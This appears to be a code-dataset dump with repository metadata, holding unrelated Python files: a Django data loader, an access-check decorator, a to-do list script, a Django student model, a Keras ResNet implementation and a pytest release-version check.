'id': int(row[0]),
'field_name': row[1],
'field_name_cn': row[2],
'source': row[3],
'path': row[4],
}
field_info_conf_list.append(feature_conf)
return field_info_conf_list
def init_feature_field():
all_feature_conf = load_field_info_from_xls('pre_field_info.xlsx')
for feature_conf in all_feature_conf:
if PreFieldInfo.objects.filter(
field_name=feature_conf['field_name'],
).count() > 0:
continue
else:
pfi = PreFieldInfo(
id=feature_conf['id'],
field_name=feature_conf['field_name'],
field_name_cn=feature_conf['field_name_cn'],
source=feature_conf['source'],
path=feature_conf['path'],
)
pfi.save()
if __name__ == '__main__':
init_feature_field()
| true
| true
|
1c40e1d1cb6ec185d05aa5e64e876a4d54ae1721
| 1,805
|
py
|
Python
|
kokemomo/plugins/engine/controller/km_access_check.py
|
Kokemomo/Kokemomo
|
614504dc49b2f509b25c9ec2229f4438db73bab7
|
[
"MIT"
] | 4
|
2016-06-12T13:19:23.000Z
|
2020-01-29T09:46:15.000Z
|
kokemomo/plugins/engine/controller/km_access_check.py
|
Kokemomo/Kokemomo
|
614504dc49b2f509b25c9ec2229f4438db73bab7
|
[
"MIT"
] | 67
|
2015-09-10T04:28:33.000Z
|
2019-09-19T09:08:11.000Z
|
kokemomo/plugins/engine/controller/km_access_check.py
|
Kokemomo/Kokemomo
|
614504dc49b2f509b25c9ec2229f4438db73bab7
|
[
"MIT"
] | 2
|
2016-06-13T11:20:42.000Z
|
2016-07-22T07:44:31.000Z
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from functools import wraps
from kokemomo.settings import SETTINGS
from kokemomo.plugins.engine.model.km_user_table import KMUser
from kokemomo.plugins.engine.model.km_group_table import KMGroup
from kokemomo.plugins.engine.model.km_role_table import KMRole
from .km_session_manager import get_value_to_session
"""
Access check class for KOKEMOMO.
It provides as a decorator each check processing.
"""
__author__ = 'hiroki'
from kokemomo.plugins.engine.model.km_storage import storage
def access_check(request):
"""
Check to see if you can access to the target page.
:param request:
:return:
"""
def _access_check(callback):
@wraps(callback)
def wrapper(*args, **kwargs):
user_id = get_value_to_session(request, 'user_id')
if user_id is not None:
user = KMUser.get(user_id)
user_id = user.id
role = KMRole(user_id)
if check_target(request, role):
return callback(*args, **kwargs)
else:
# TODO: 例外スロー時にエラー画面に遷移するようにする
return "<p>Access is not allowed!</p>"
return wrapper
return _access_check
def check_target(request, role):
paths = request.path.split('/')
path = '/' + paths[1]
is_target = False
size = len(paths)
if size > 1 and role.target == path: # application scope
is_target = True
# function scope
elif size > 3 and role.target == '/'.join([path, paths[2]]):
is_target = True
# sub function scope
elif size > 5 and role.target == '/'.join([path, paths[2], paths[3]]):
is_target = True
if is_target and not role.is_allow:
return False
return True
| 27.769231
| 74
| 0.629363
|
from functools import wraps
from kokemomo.settings import SETTINGS
from kokemomo.plugins.engine.model.km_user_table import KMUser
from kokemomo.plugins.engine.model.km_group_table import KMGroup
from kokemomo.plugins.engine.model.km_role_table import KMRole
from .km_session_manager import get_value_to_session
__author__ = 'hiroki'
from kokemomo.plugins.engine.model.km_storage import storage
def access_check(request):
def _access_check(callback):
@wraps(callback)
def wrapper(*args, **kwargs):
user_id = get_value_to_session(request, 'user_id')
if user_id is not None:
user = KMUser.get(user_id)
user_id = user.id
role = KMRole(user_id)
if check_target(request, role):
return callback(*args, **kwargs)
else:
return "<p>Access is not allowed!</p>"
return wrapper
return _access_check
def check_target(request, role):
paths = request.path.split('/')
path = '/' + paths[1]
is_target = False
size = len(paths)
if size > 1 and role.target == path:
is_target = True
elif size > 3 and role.target == '/'.join([path, paths[2]]):
is_target = True
elif size > 5 and role.target == '/'.join([path, paths[2], paths[3]]):
is_target = True
if is_target and not role.is_allow:
return False
return True
| true
| true
|
1c40e30cd61d7c7f4fac7d007a8b7b4a5d1ec687
| 1,159
|
py
|
Python
|
todoList.py
|
G3Code-CS/Python2-follow-along
|
267ca69e9bd90e3ccffebf8417a371779e8a3575
|
[
"MIT"
] | null | null | null |
todoList.py
|
G3Code-CS/Python2-follow-along
|
267ca69e9bd90e3ccffebf8417a371779e8a3575
|
[
"MIT"
] | null | null | null |
todoList.py
|
G3Code-CS/Python2-follow-along
|
267ca69e9bd90e3ccffebf8417a371779e8a3575
|
[
"MIT"
] | null | null | null |
class TodoList:
def __init__(self, name):
self.name=name
self.items=[]
def __str__(self):
return f"{self.name}: {self.items}"
def __repr__(self):
return f"TodoList({repr(self.name)})"
quit = False
all_lists = []
current_list = None
while not quit:
#Get the input from the user
command = input(f"(C)reate a new list\n(S)elect a list ({all_lists})\n(A)dd an item\n(Q)uit\nCommand : ")
command = command.lower().strip()[0]
if command == 'q': # quit
quit = True
elif command == 'c': # create
name = input("Enter list name :").strip()
new_list = TodoList(name)
all_lists.append(new_list)
print(all_lists)
elif command == 's': # Select
name = input("Enter list name:").strip()
named_list = None
for l in all_lists:
if l.name == name:
named_list = l
break
if named_list is None:
print(f"No such list named {name}")
else:
current_list = named_list
print(f"Current selected list is ({current_list})")
| 25.195652
| 109
| 0.543572
|
class TodoList:
def __init__(self, name):
self.name=name
self.items=[]
def __str__(self):
return f"{self.name}: {self.items}"
def __repr__(self):
return f"TodoList({repr(self.name)})"
quit = False
all_lists = []
current_list = None
while not quit:
command = input(f"(C)reate a new list\n(S)elect a list ({all_lists})\n(A)dd an item\n(Q)uit\nCommand : ")
command = command.lower().strip()[0]
if command == 'q':
quit = True
elif command == 'c':
name = input("Enter list name :").strip()
new_list = TodoList(name)
all_lists.append(new_list)
print(all_lists)
elif command == 's':
name = input("Enter list name:").strip()
named_list = None
for l in all_lists:
if l.name == name:
named_list = l
break
if named_list is None:
print(f"No such list named {name}")
else:
current_list = named_list
print(f"Current selected list is ({current_list})")
| true
| true
|
1c40e5a38c227ab144e1e0c27c22be55c55890a2
| 1,333
|
py
|
Python
|
sgi/academico/models/aluno.py
|
jorgevilaca82/SGI
|
c3f13d9e3e8f04377d9e23636dc8e35ed5ace35a
|
[
"MIT"
] | null | null | null |
sgi/academico/models/aluno.py
|
jorgevilaca82/SGI
|
c3f13d9e3e8f04377d9e23636dc8e35ed5ace35a
|
[
"MIT"
] | 8
|
2019-12-07T13:13:34.000Z
|
2021-09-02T03:07:25.000Z
|
sgi/academico/models/aluno.py
|
jorgevilaca82/SGI
|
c3f13d9e3e8f04377d9e23636dc8e35ed5ace35a
|
[
"MIT"
] | null | null | null |
from enum import IntEnum, auto
from django.db import models
from django.utils.translation import gettext_lazy as _
from sgi.base import models as bm
class Aluno(bm.PessoaFisica):
"""
A Pessoa Física só se torna um aluno quando está devidamente
associada um curso. Uma Pessoa Física pode ser aluno de mais de um curso,
mas nunca mais que dois e sem conflito de turnos
"""
class Status(IntEnum):
MATRICULADO = auto()
EVADIDO = auto()
TRANCADO = auto()
JUBILADO = auto()
CANCELADO = auto()
EGRESSO = auto()
FORMADO = auto()
AFASTADO = auto()
FALECIDO = auto()
ALUNO_STATUS_CHOICES = (
(Status.MATRICULADO.value, _("Matriculado")),
(Status.EVADIDO.value, _("Evadido")),
(Status.TRANCADO.value, _("Trancado")),
(Status.JUBILADO.value, _("Jubilado")),
(Status.CANCELADO.value, _("Cancelado")),
(Status.EGRESSO.value, _("Egresso")),
(Status.FORMADO.value, _("Formado")),
(Status.AFASTADO.value, _("Afastado")),
(Status.FALECIDO.value, _("Falecido")),
)
status = models.IntegerField(choices=ALUNO_STATUS_CHOICES)
# RA - Registro de Aluno (identificador de matricula)
ra = models.CharField(max_length=20, default="", editable=False, unique=True)
| 31
| 81
| 0.634659
|
from enum import IntEnum, auto
from django.db import models
from django.utils.translation import gettext_lazy as _
from sgi.base import models as bm
class Aluno(bm.PessoaFisica):
class Status(IntEnum):
MATRICULADO = auto()
EVADIDO = auto()
TRANCADO = auto()
JUBILADO = auto()
CANCELADO = auto()
EGRESSO = auto()
FORMADO = auto()
AFASTADO = auto()
FALECIDO = auto()
ALUNO_STATUS_CHOICES = (
(Status.MATRICULADO.value, _("Matriculado")),
(Status.EVADIDO.value, _("Evadido")),
(Status.TRANCADO.value, _("Trancado")),
(Status.JUBILADO.value, _("Jubilado")),
(Status.CANCELADO.value, _("Cancelado")),
(Status.EGRESSO.value, _("Egresso")),
(Status.FORMADO.value, _("Formado")),
(Status.AFASTADO.value, _("Afastado")),
(Status.FALECIDO.value, _("Falecido")),
)
status = models.IntegerField(choices=ALUNO_STATUS_CHOICES)
ra = models.CharField(max_length=20, default="", editable=False, unique=True)
| true
| true
|
1c40e64a01511123306d104ac282830293f3b951
| 14,127
|
py
|
Python
|
classification_models/models/resnet.py
|
NazaninTafreshi/classification_models
|
a953e96614ef2211c654c625bbf968c2e5d04fb9
|
[
"MIT"
] | null | null | null |
classification_models/models/resnet.py
|
NazaninTafreshi/classification_models
|
a953e96614ef2211c654c625bbf968c2e5d04fb9
|
[
"MIT"
] | null | null | null |
classification_models/models/resnet.py
|
NazaninTafreshi/classification_models
|
a953e96614ef2211c654c625bbf968c2e5d04fb9
|
[
"MIT"
] | null | null | null |
import os
import collections
from ._common_blocks import ChannelSE
from .. import get_submodules_from_kwargs
from ..weights import load_model_weights
backend = None
layers = None
models = None
keras_utils = None
ModelParams = collections.namedtuple(
'ModelParams',
['model_name', 'repetitions', 'residual_block', 'attention']
)
# -------------------------------------------------------------------------
# Helpers functions
# -------------------------------------------------------------------------
def handle_block_names(stage, block):
name_base = 'stage{}_unit{}_'.format(stage + 1, block + 1)
conv_name = name_base + 'conv'
bn_name = name_base + 'bn'
relu_name = name_base + 'relu'
sc_name = name_base + 'sc'
return conv_name, bn_name, relu_name, sc_name
def get_conv_params(**params):
default_conv_params = {
'kernel_initializer': 'he_uniform',
'use_bias': False,
'padding': 'valid',
}
default_conv_params.update(params)
return default_conv_params
def get_bn_params(**params):
axis = 3 if backend.image_data_format() == 'channels_last' else 1
default_bn_params = {
'axis': axis,
'momentum': 0.99,
'epsilon': 2e-5,
'center': True,
'scale': True,
}
default_bn_params.update(params)
return default_bn_params
# -------------------------------------------------------------------------
# Residual blocks
# -------------------------------------------------------------------------
def residual_conv_block(filters, stage, block, strides=(1, 1), attention=None, cut='pre'):
"""The identity block is the block that has no conv layer at shortcut.
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of
middle conv layer at main path
filters: list of integers, the filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
cut: one of 'pre', 'post'. used to decide where skip connection is taken
# Returns
Output tensor for the block.
"""
def layer(input_tensor):
# get params and names of layers
conv_params = get_conv_params()
bn_params = get_bn_params()
conv_name, bn_name, relu_name, sc_name = handle_block_names(stage, block)
x = layers.BatchNormalization(name=bn_name + '1', **bn_params)(input_tensor)
x = layers.Activation('relu', name=relu_name + '1')(x)
# defining shortcut connection
if cut == 'pre':
shortcut = input_tensor
elif cut == 'post':
shortcut = layers.Conv2D(filters, (1, 1), name=sc_name, strides=strides, **conv_params)(x)
else:
raise ValueError('Cut type not in ["pre", "post"]')
# continue with convolution layers
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(filters, (3, 3), strides=strides, name=conv_name + '1', **conv_params)(x)
x = layers.BatchNormalization(name=bn_name + '2', **bn_params)(x)
x = layers.Activation('relu', name=relu_name + '2')(x)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(filters, (3, 3), name=conv_name + '2', **conv_params)(x)
# use attention block if defined
if attention is not None:
x = attention(x)
# add residual connection
x = layers.Add()([x, shortcut])
return x
return layer
def residual_bottleneck_block(filters, stage, block, strides=None, attention=None, cut='pre'):
"""The identity block is the block that has no conv layer at shortcut.
# Arguments
input_tensor: input tensor
kernel_size: default 3, the kernel size of
middle conv layer at main path
filters: list of integers, the filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
cut: one of 'pre', 'post'. used to decide where skip connection is taken
# Returns
Output tensor for the block.
"""
def layer(input_tensor):
# get params and names of layers
conv_params = get_conv_params()
bn_params = get_bn_params()
conv_name, bn_name, relu_name, sc_name = handle_block_names(stage, block)
x = layers.BatchNormalization(name=bn_name + '1', **bn_params)(input_tensor)
x = layers.Activation('relu', name=relu_name + '1')(x)
# defining shortcut connection
if cut == 'pre':
shortcut = input_tensor
elif cut == 'post':
shortcut = layers.Conv2D(filters * 4, (1, 1), name=sc_name, strides=strides, **conv_params)(x)
else:
raise ValueError('Cut type not in ["pre", "post"]')
# continue with convolution layers
x = layers.Conv2D(filters, (1, 1), name=conv_name + '1', **conv_params)(x)
x = layers.BatchNormalization(name=bn_name + '2', **bn_params)(x)
x = layers.Activation('relu', name=relu_name + '2')(x)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(filters, (3, 3), strides=strides, name=conv_name + '2', **conv_params)(x)
x = layers.BatchNormalization(name=bn_name + '3', **bn_params)(x)
x = layers.Activation('relu', name=relu_name + '3')(x)
x = layers.Conv2D(filters * 4, (1, 1), name=conv_name + '3', **conv_params)(x)
# use attention block if defined
if attention is not None:
x = attention(x)
# add residual connection
x = layers.Add()([x, shortcut])
return x
return layer
# -------------------------------------------------------------------------
# Residual Model Builder
# -------------------------------------------------------------------------
def ResNet(model_params, input_shape=None, input_tensor=None, include_top=True,
classes=1000, weights='imagenet', **kwargs):
"""Instantiates the ResNet, SEResNet architecture.
Optionally loads weights pre-trained on ImageNet.
Note that the data format convention used by the model is
the one specified in your Keras config at `~/.keras/keras.json`.
Args:
include_top: whether to include the fully-connected
layer at the top of the network.
weights: one of `None` (random initialization),
'imagenet' (pre-training on ImageNet),
or the path to the weights file to be loaded.
input_tensor: optional Keras tensor
(i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
has to be `(224, 224, 3)` (with `channels_last` data format)
or `(3, 224, 224)` (with `channels_first` data format).
It should have exactly 3 inputs channels.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
Returns:
A Keras model instance.
Raises:
ValueError: in case of invalid argument for `weights`,
or invalid input shape.
"""
global backend, layers, models, keras_utils
backend, layers, models, keras_utils = get_submodules_from_kwargs(kwargs)
if input_tensor is None:
img_input = layers.Input(shape=input_shape, name='data')
else:
if not backend.is_keras_tensor(input_tensor):
img_input = layers.Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
# choose residual block type
ResidualBlock = model_params.residual_block
if model_params.attention:
Attention = model_params.attention(**kwargs)
else:
Attention = None
# get parameters for model layers
no_scale_bn_params = get_bn_params(scale=False)
bn_params = get_bn_params()
conv_params = get_conv_params()
init_filters = 64
print("Building custom resnet model")
# resnet bottom
x = layers.BatchNormalization(name='bn_data', **no_scale_bn_params)(img_input)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(init_filters, (3, 3), strides=(1, 1), name='conv0', **conv_params)(x)
# x = layers.Conv2D(init_filters, (3, 3), strides=(1, 1), name='conv0', **conv_params)(x)
x = layers.BatchNormalization(name='bn0', **bn_params)(x)
x = layers.Activation('relu', name='relu0')(x)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
# x = layers.MaxPooling2D((3, 3), strides=(2, 2), padding='valid', name='pooling0')(x)
# resnet body
for stage, rep in enumerate(model_params.repetitions):
for block in range(rep):
filters = init_filters * (2 ** stage)
# first block of first stage without strides because we have maxpooling before
if block == 0 and stage == 0:
x = ResidualBlock(filters, stage, block, strides=(1, 1),
cut='post', attention=Attention)(x)
elif block == 0:
x = ResidualBlock(filters, stage, block, strides=(2, 2),
cut='post', attention=Attention)(x)
else:
x = ResidualBlock(filters, stage, block, strides=(1, 1),
cut='pre', attention=Attention)(x)
x = layers.BatchNormalization(name='bn1', **bn_params)(x)
x = layers.Activation('relu', name='relu1')(x)
# resnet top
if include_top:
x = layers.GlobalAveragePooling2D(name='pool1')(x)
x = layers.Dense(classes, name='fc1')(x)
x = layers.Activation('softmax', name='softmax')(x)
# Ensure that the model takes into account any potential predecessors of `input_tensor`.
if input_tensor is not None:
inputs = keras_utils.get_source_inputs(input_tensor)
else:
inputs = img_input
# Create model.
model = models.Model(inputs, x)
if weights:
if type(weights) == str and os.path.exists(weights):
model.load_weights(weights)
else:
load_model_weights(model, model_params.model_name,
weights, classes, include_top, **kwargs)
return model
# -------------------------------------------------------------------------
# Residual Models
# -------------------------------------------------------------------------
MODELS_PARAMS = {
'resnet18': ModelParams('resnet18', (2, 2, 2, 2), residual_conv_block, None),
'resnet34': ModelParams('resnet34', (3, 4, 6, 3), residual_conv_block, None),
'resnet50': ModelParams('resnet50', (3, 4, 6, 3), residual_bottleneck_block, None),
'resnet101': ModelParams('resnet101', (3, 4, 23, 3), residual_bottleneck_block, None),
'resnet152': ModelParams('resnet152', (3, 8, 36, 3), residual_bottleneck_block, None),
'seresnet18': ModelParams('seresnet18', (2, 2, 2, 2), residual_conv_block, ChannelSE),
'seresnet34': ModelParams('seresnet34', (3, 4, 6, 3), residual_conv_block, ChannelSE),
}
def ResNet18(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet18'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet34(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet34'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet50(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet50'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet101(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet101'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet152(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet152'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def SEResNet18(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['seresnet18'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def SEResNet34(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['seresnet34'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def preprocess_input(x, **kwargs):
return x
setattr(ResNet18, '__doc__', ResNet.__doc__)
setattr(ResNet34, '__doc__', ResNet.__doc__)
setattr(ResNet50, '__doc__', ResNet.__doc__)
setattr(ResNet101, '__doc__', ResNet.__doc__)
setattr(ResNet152, '__doc__', ResNet.__doc__)
setattr(SEResNet18, '__doc__', ResNet.__doc__)
setattr(SEResNet34, '__doc__', ResNet.__doc__)
| 35.494975
| 108
| 0.609825
|
import os
import collections
from ._common_blocks import ChannelSE
from .. import get_submodules_from_kwargs
from ..weights import load_model_weights
backend = None
layers = None
models = None
keras_utils = None
ModelParams = collections.namedtuple(
'ModelParams',
['model_name', 'repetitions', 'residual_block', 'attention']
)
def handle_block_names(stage, block):
name_base = 'stage{}_unit{}_'.format(stage + 1, block + 1)
conv_name = name_base + 'conv'
bn_name = name_base + 'bn'
relu_name = name_base + 'relu'
sc_name = name_base + 'sc'
return conv_name, bn_name, relu_name, sc_name
def get_conv_params(**params):
default_conv_params = {
'kernel_initializer': 'he_uniform',
'use_bias': False,
'padding': 'valid',
}
default_conv_params.update(params)
return default_conv_params
def get_bn_params(**params):
axis = 3 if backend.image_data_format() == 'channels_last' else 1
default_bn_params = {
'axis': axis,
'momentum': 0.99,
'epsilon': 2e-5,
'center': True,
'scale': True,
}
default_bn_params.update(params)
return default_bn_params
def residual_conv_block(filters, stage, block, strides=(1, 1), attention=None, cut='pre'):
def layer(input_tensor):
conv_params = get_conv_params()
bn_params = get_bn_params()
conv_name, bn_name, relu_name, sc_name = handle_block_names(stage, block)
x = layers.BatchNormalization(name=bn_name + '1', **bn_params)(input_tensor)
x = layers.Activation('relu', name=relu_name + '1')(x)
if cut == 'pre':
shortcut = input_tensor
elif cut == 'post':
shortcut = layers.Conv2D(filters, (1, 1), name=sc_name, strides=strides, **conv_params)(x)
else:
raise ValueError('Cut type not in ["pre", "post"]')
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(filters, (3, 3), strides=strides, name=conv_name + '1', **conv_params)(x)
x = layers.BatchNormalization(name=bn_name + '2', **bn_params)(x)
x = layers.Activation('relu', name=relu_name + '2')(x)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(filters, (3, 3), name=conv_name + '2', **conv_params)(x)
if attention is not None:
x = attention(x)
x = layers.Add()([x, shortcut])
return x
return layer
def residual_bottleneck_block(filters, stage, block, strides=None, attention=None, cut='pre'):
def layer(input_tensor):
conv_params = get_conv_params()
bn_params = get_bn_params()
conv_name, bn_name, relu_name, sc_name = handle_block_names(stage, block)
x = layers.BatchNormalization(name=bn_name + '1', **bn_params)(input_tensor)
x = layers.Activation('relu', name=relu_name + '1')(x)
if cut == 'pre':
shortcut = input_tensor
elif cut == 'post':
shortcut = layers.Conv2D(filters * 4, (1, 1), name=sc_name, strides=strides, **conv_params)(x)
else:
raise ValueError('Cut type not in ["pre", "post"]')
x = layers.Conv2D(filters, (1, 1), name=conv_name + '1', **conv_params)(x)
x = layers.BatchNormalization(name=bn_name + '2', **bn_params)(x)
x = layers.Activation('relu', name=relu_name + '2')(x)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(filters, (3, 3), strides=strides, name=conv_name + '2', **conv_params)(x)
x = layers.BatchNormalization(name=bn_name + '3', **bn_params)(x)
x = layers.Activation('relu', name=relu_name + '3')(x)
x = layers.Conv2D(filters * 4, (1, 1), name=conv_name + '3', **conv_params)(x)
if attention is not None:
x = attention(x)
x = layers.Add()([x, shortcut])
return x
return layer
def ResNet(model_params, input_shape=None, input_tensor=None, include_top=True,
classes=1000, weights='imagenet', **kwargs):
global backend, layers, models, keras_utils
backend, layers, models, keras_utils = get_submodules_from_kwargs(kwargs)
if input_tensor is None:
img_input = layers.Input(shape=input_shape, name='data')
else:
if not backend.is_keras_tensor(input_tensor):
img_input = layers.Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
ResidualBlock = model_params.residual_block
if model_params.attention:
Attention = model_params.attention(**kwargs)
else:
Attention = None
no_scale_bn_params = get_bn_params(scale=False)
bn_params = get_bn_params()
conv_params = get_conv_params()
init_filters = 64
print("Building custom resnet model")
x = layers.BatchNormalization(name='bn_data', **no_scale_bn_params)(img_input)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(init_filters, (3, 3), strides=(1, 1), name='conv0', **conv_params)(x)
x = layers.BatchNormalization(name='bn0', **bn_params)(x)
x = layers.Activation('relu', name='relu0')(x)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
for stage, rep in enumerate(model_params.repetitions):
for block in range(rep):
filters = init_filters * (2 ** stage)
if block == 0 and stage == 0:
x = ResidualBlock(filters, stage, block, strides=(1, 1),
cut='post', attention=Attention)(x)
elif block == 0:
x = ResidualBlock(filters, stage, block, strides=(2, 2),
cut='post', attention=Attention)(x)
else:
x = ResidualBlock(filters, stage, block, strides=(1, 1),
cut='pre', attention=Attention)(x)
x = layers.BatchNormalization(name='bn1', **bn_params)(x)
x = layers.Activation('relu', name='relu1')(x)
if include_top:
x = layers.GlobalAveragePooling2D(name='pool1')(x)
x = layers.Dense(classes, name='fc1')(x)
x = layers.Activation('softmax', name='softmax')(x)
if input_tensor is not None:
inputs = keras_utils.get_source_inputs(input_tensor)
else:
inputs = img_input
model = models.Model(inputs, x)
if weights:
if type(weights) == str and os.path.exists(weights):
model.load_weights(weights)
else:
load_model_weights(model, model_params.model_name,
weights, classes, include_top, **kwargs)
return model
MODELS_PARAMS = {
'resnet18': ModelParams('resnet18', (2, 2, 2, 2), residual_conv_block, None),
'resnet34': ModelParams('resnet34', (3, 4, 6, 3), residual_conv_block, None),
'resnet50': ModelParams('resnet50', (3, 4, 6, 3), residual_bottleneck_block, None),
'resnet101': ModelParams('resnet101', (3, 4, 23, 3), residual_bottleneck_block, None),
'resnet152': ModelParams('resnet152', (3, 8, 36, 3), residual_bottleneck_block, None),
'seresnet18': ModelParams('seresnet18', (2, 2, 2, 2), residual_conv_block, ChannelSE),
'seresnet34': ModelParams('seresnet34', (3, 4, 6, 3), residual_conv_block, ChannelSE),
}
def ResNet18(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet18'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet34(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet34'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet50(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet50'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet101(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet101'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet152(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet152'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def SEResNet18(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['seresnet18'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def SEResNet34(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['seresnet34'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def preprocess_input(x, **kwargs):
return x
setattr(ResNet18, '__doc__', ResNet.__doc__)
setattr(ResNet34, '__doc__', ResNet.__doc__)
setattr(ResNet50, '__doc__', ResNet.__doc__)
setattr(ResNet101, '__doc__', ResNet.__doc__)
setattr(ResNet152, '__doc__', ResNet.__doc__)
setattr(SEResNet18, '__doc__', ResNet.__doc__)
setattr(SEResNet34, '__doc__', ResNet.__doc__)
| true
| true
|
1c40e73ab629ea0dbb00732d80f05e8fcb8c73d4
| 2,385
|
py
|
Python
|
tests/test_release_checks.py
|
iRomi14/drmlib
|
0e7da6f9ec7aca3c167db667f1251b33c989bc5b
|
[
"Apache-2.0"
] | null | null | null |
tests/test_release_checks.py
|
iRomi14/drmlib
|
0e7da6f9ec7aca3c167db667f1251b33c989bc5b
|
[
"Apache-2.0"
] | null | null | null |
tests/test_release_checks.py
|
iRomi14/drmlib
|
0e7da6f9ec7aca3c167db667f1251b33c989bc5b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Performs some pre-release checks
"""
import pytest
from tests.conftest import perform_once
def test_changelog_and_version(accelize_drm):
"""
Checks if Version match with Git tag and if changelog is up to date.
"""
perform_once(__name__ + '.test_changelog_and_version')
from os.path import join
from subprocess import run, PIPE
from re import fullmatch
if not accelize_drm.pytest_build_environment:
pytest.skip("Can only be checked in build environment")
# Ensure tags are pulled
try:
run(['git', 'fetch', '--tags', '--force'],
stderr=PIPE, stdout=PIPE, universal_newlines=True)
except FileNotFoundError:
fail = (
pytest.fail if accelize_drm.pytest_build_type == 'debug' else
pytest.xfail)
fail('Git is required for this test.')
# Get head tag if any
result = run(['git', 'describe', '--abbrev=0', '--exact-match', '--tags',
'HEAD'], stderr=PIPE, stdout=PIPE, universal_newlines=True)
if result.returncode:
pytest.skip("Can only be checked on tagged git head")
tag = result.stdout.strip()
version = tag.lstrip('v')
# Checks tag format using library version
lib_ver = accelize_drm.get_api_version()
assert tag == 'v%s' % (lib_ver.version.split('+')[0])
# Check tag format match semantic versioning
if not fullmatch(r'^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)'
r'(-(0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)'
r'(\.(0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*)?'
r'(\+[0-9a-zA-Z-]+(\.[0-9a-zA-Z-]+)*)?$', version):
pytest.fail('"%s" does not match semantic versioning format.' % version)
# Check if changelog is up-to-date (Not for prereleases)
if not lib_ver.prerelease:
changelog_path = join(accelize_drm.pytest_build_source_dir, 'CHANGELOG')
with open(changelog_path, 'rt') as changelog:
last_change = changelog.readline().strip()
assert fullmatch(
r"\* [a-zA-Z]{3} [a-zA-Z]{3} [0-9]{2} [0-9]{4} Accelize " + tag,
last_change)
# Check prerelease format:
# Alpha: "1.0.0-alpha.1"
# Beta: "1.0.0-beta.1"
# Release candidate: "1.0.0-rc.1"
else:
assert fullmatch(r"(alpha|beta|rc)\.[0-9]+", lib_ver.prerelease)
| 34.071429
| 80
| 0.592872
|
